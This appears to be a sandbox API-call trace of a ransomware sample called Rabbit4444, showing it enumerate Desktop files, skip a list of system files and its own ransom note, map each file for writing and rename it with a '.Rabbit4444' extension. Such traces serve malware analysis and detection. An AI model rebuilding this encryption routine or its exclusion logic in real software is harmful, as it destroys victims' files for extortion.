QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.032] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14134322527) returned 1 [0050.033] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=68452) returned 1 [0050.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0050.033] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e70, lpName=0x0) returned 0x298 [0050.033] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10e70) returned 0x70000 [0050.034] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.034] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.034] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.034] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.034] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.035] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14134558638) returned 1 [0050.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0050.035] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.036] CloseHandle (hObject=0x298) returned 1 [0050.036] CloseHandle (hObject=0x278) returned 1 [0050.037] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\ClJz2xAW_8zhk38m.mp4.Rabbit4444") returned 55 [0050.037] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ClJz2xAW_8zhk38m.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cljz2xaw_8zhk38m.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ClJz2xAW_8zhk38m.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cljz2xaw_8zhk38m.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.038] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6cb94c0, ftCreationTime.dwHighDateTime=0x1d4cf26, ftLastAccessTime.dwLowDateTime=0xdad1b270, ftLastAccessTime.dwHighDateTime=0x1d4c87d, ftLastWriteTime.dwLowDateTime=0xdad1b270, ftLastWriteTime.dwHighDateTime=0x1d4c87d, nFileSizeHigh=0x0, nFileSizeLow=0x700b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D lSV8sh3seQkpeGf8.ods", cAlternateFileName="DLSV8S~1.ODS")) returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="Rabbit4444.exe") returned -1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2=".") returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="..") returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="windows") returned -1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="bootmgr") returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="pagefile.sys") returned -1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="boot") returned 1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="ids.txt") returned -1 [0050.038] lstrcmpiW (lpString1="D lSV8sh3seQkpeGf8.ods", lpString2="NTUSER.DAT") returned -1 [0050.038] lstrcpyW (in: lpString1=0x130eb68, lpString2="D lSV8sh3seQkpeGf8.ods" | out: lpString1="D lSV8sh3seQkpeGf8.ods") returned="D lSV8sh3seQkpeGf8.ods" [0050.038] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\D lSV8sh3seQkpeGf8.ods", dwFileAttributes=0x0) returned 1 [0050.038] lstrlenW (lpString="D lSV8sh3seQkpeGf8.ods") returned 22 [0050.038] lstrlenW (lpString="Rabbit4444") returned 10 [0050.038] lstrcmpiW (lpString1="kpeGf8.ods", lpString2="Rabbit4444") returned -1 [0050.038] lstrlenW (lpString=".dll") returned 4 [0050.038] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0050.038] lstrlenW (lpString=".lnk") returned 4 [0050.038] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0050.038] lstrlenW (lpString=".ini") returned 4 [0050.038] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0050.038] lstrlenW (lpString=".sys") returned 4 [0050.038] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0050.038] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\D lSV8sh3seQkpeGf8.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\d lsv8sh3seqkpegf8.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.039] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.039] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14134932461) returned 1 [0050.039] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=28683) returned 1 [0050.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0050.039] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7310, lpName=0x0) returned 0x298 [0050.039] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7310) returned 0x70000 [0050.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.040] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14135097163) returned 1 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0050.040] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.041] CloseHandle (hObject=0x298) returned 1 [0050.041] CloseHandle (hObject=0x278) returned 1 [0050.042] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\D lSV8sh3seQkpeGf8.ods.Rabbit4444") returned 57 [0050.042] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\D lSV8sh3seQkpeGf8.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\d lsv8sh3seqkpegf8.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\D lSV8sh3seQkpeGf8.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\d lsv8sh3seqkpegf8.ods.rabbit4444"), dwFlags=0x1) returned 1 [0050.046] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0050.046] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0050.046] lstrcpyW (in: lpString1=0x130eb68, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.046] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", dwFileAttributes=0x22) returned 1 [0050.046] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", dwFileAttributes=0x6) returned 1 [0050.046] lstrlenW (lpString="desktop.ini") returned 11 [0050.046] lstrlenW (lpString="Rabbit4444") returned 10 [0050.047] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0050.047] lstrlenW (lpString=".dll") returned 4 [0050.047] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.047] lstrlenW (lpString=".lnk") returned 4 [0050.047] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.047] lstrlenW (lpString=".ini") returned 4 [0050.047] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.047] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7eb7120, ftCreationTime.dwHighDateTime=0x1d4ca26, ftLastAccessTime.dwLowDateTime=0x576e6dc0, ftLastAccessTime.dwHighDateTime=0x1d4d5ec, ftLastWriteTime.dwLowDateTime=0x576e6dc0, ftLastWriteTime.dwHighDateTime=0x1d4d5ec, nFileSizeHigh=0x0, nFileSizeLow=0xe626, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ewezVPkDgW.avi", cAlternateFileName="EWEZVP~1.AVI")) returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="Rabbit4444.exe") returned -1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2=".") returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="..") returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="windows") returned -1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="bootmgr") returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="pagefile.sys") returned -1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="boot") returned 1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="ids.txt") returned -1 [0050.047] lstrcmpiW (lpString1="ewezVPkDgW.avi", lpString2="NTUSER.DAT") returned -1 [0050.047] lstrcpyW (in: lpString1=0x130eb68, lpString2="ewezVPkDgW.avi" | out: lpString1="ewezVPkDgW.avi") returned="ewezVPkDgW.avi" [0050.047] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ewezVPkDgW.avi", dwFileAttributes=0x0) returned 1 [0050.047] lstrlenW (lpString="ewezVPkDgW.avi") returned 14 [0050.047] lstrlenW (lpString="Rabbit4444") returned 10 [0050.047] lstrcmpiW (lpString1="VPkDgW.avi", lpString2="Rabbit4444") returned 1 [0050.047] lstrlenW (lpString=".dll") returned 4 [0050.047] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.047] lstrlenW (lpString=".lnk") returned 4 [0050.047] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.047] lstrlenW (lpString=".ini") returned 4 [0050.047] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.047] lstrlenW (lpString=".sys") returned 4 [0050.047] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ewezVPkDgW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ewezvpkdgw.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.048] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.048] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14135844421) returned 1 [0050.048] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58918) returned 1 [0050.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0050.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.048] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe930, lpName=0x0) returned 0x298 [0050.048] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe930) returned 0x70000 [0050.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.050] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.050] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.050] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.050] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.050] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.050] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14136066143) returned 1 [0050.050] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0050.050] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.050] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.051] CloseHandle (hObject=0x298) returned 1 [0050.051] CloseHandle (hObject=0x278) returned 1 [0050.052] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\ewezVPkDgW.avi.Rabbit4444") returned 49 [0050.052] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ewezVPkDgW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ewezvpkdgw.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ewezVPkDgW.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ewezvpkdgw.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.053] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f5e1b0, ftCreationTime.dwHighDateTime=0x1d4d4bd, ftLastAccessTime.dwLowDateTime=0x4b5bbf10, ftLastAccessTime.dwHighDateTime=0x1d4d097, ftLastWriteTime.dwLowDateTime=0x4b5bbf10, ftLastWriteTime.dwHighDateTime=0x1d4d097, nFileSizeHigh=0x0, nFileSizeLow=0x18143, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G0J-6mO5v.avi", cAlternateFileName="G0J-6M~1.AVI")) returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="Rabbit4444.exe") returned -1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2=".") returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="..") returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="windows") returned -1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="bootmgr") returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="pagefile.sys") returned -1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="boot") returned 1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="ids.txt") returned -1 [0050.053] lstrcmpiW (lpString1="G0J-6mO5v.avi", lpString2="NTUSER.DAT") returned -1 [0050.053] lstrcpyW (in: lpString1=0x130eb68, lpString2="G0J-6mO5v.avi" | out: lpString1="G0J-6mO5v.avi") returned="G0J-6mO5v.avi" [0050.053] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\G0J-6mO5v.avi", dwFileAttributes=0x0) returned 1 [0050.053] lstrlenW (lpString="G0J-6mO5v.avi") returned 13 [0050.053] lstrlenW (lpString="Rabbit4444") returned 10 [0050.053] lstrcmpiW (lpString1="-6mO5v.avi", lpString2="Rabbit4444") returned -1 [0050.054] lstrlenW (lpString=".dll") returned 4 [0050.054] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.054] lstrlenW (lpString=".lnk") returned 4 [0050.054] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.054] lstrlenW (lpString=".ini") returned 4 [0050.054] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.054] lstrlenW (lpString=".sys") returned 4 [0050.054] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\G0J-6mO5v.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\g0j-6mo5v.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.054] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.054] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14136467002) returned 1 [0050.054] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=98627) returned 1 [0050.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0050.054] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18450, lpName=0x0) returned 0x298 [0050.054] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18450) returned 0x70000 [0050.056] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.057] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.057] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14136769412) returned 1 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0050.057] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.058] CloseHandle (hObject=0x298) returned 1 [0050.058] CloseHandle (hObject=0x278) returned 1 [0050.059] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\G0J-6mO5v.avi.Rabbit4444") returned 48 [0050.059] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\G0J-6mO5v.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\g0j-6mo5v.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\G0J-6mO5v.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\g0j-6mo5v.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.059] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x369473a0, ftCreationTime.dwHighDateTime=0x1d4cb39, ftLastAccessTime.dwLowDateTime=0x13ed36d0, ftLastAccessTime.dwHighDateTime=0x1d4c719, ftLastWriteTime.dwLowDateTime=0x13ed36d0, ftLastWriteTime.dwHighDateTime=0x1d4c719, nFileSizeHigh=0x0, nFileSizeLow=0x56e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GOw9MGna.png", cAlternateFileName="")) returned 1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="Rabbit4444.exe") returned -1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2=".") returned 1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="..") returned 1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="windows") returned -1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="bootmgr") returned 1 [0050.059] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="pagefile.sys") returned -1 [0050.060] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="boot") returned 1 [0050.060] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="ids.txt") returned -1 [0050.060] lstrcmpiW (lpString1="GOw9MGna.png", lpString2="NTUSER.DAT") returned -1 [0050.060] lstrcpyW (in: lpString1=0x130eb68, lpString2="GOw9MGna.png" | out: lpString1="GOw9MGna.png") returned="GOw9MGna.png" [0050.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GOw9MGna.png", dwFileAttributes=0x0) returned 1 [0050.060] lstrlenW (lpString="GOw9MGna.png") returned 12 [0050.060] lstrlenW (lpString="Rabbit4444") returned 10 [0050.060] lstrcmpiW (lpString1="w9MGna.png", lpString2="Rabbit4444") returned 1 [0050.060] lstrlenW (lpString=".dll") returned 4 [0050.060] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.060] lstrlenW (lpString=".lnk") returned 4 [0050.060] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.060] lstrlenW (lpString=".ini") returned 4 [0050.060] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.060] lstrlenW (lpString=".sys") returned 4 [0050.060] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GOw9MGna.png" (normalized: "c:\\users\\fd1hvy\\desktop\\gow9mgna.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.060] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.060] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14137101984) returned 1 [0050.060] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22242) returned 1 [0050.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0050.060] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.060] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x59f0, lpName=0x0) returned 0x298 [0050.061] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x59f0) returned 0x70000 [0050.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.062] 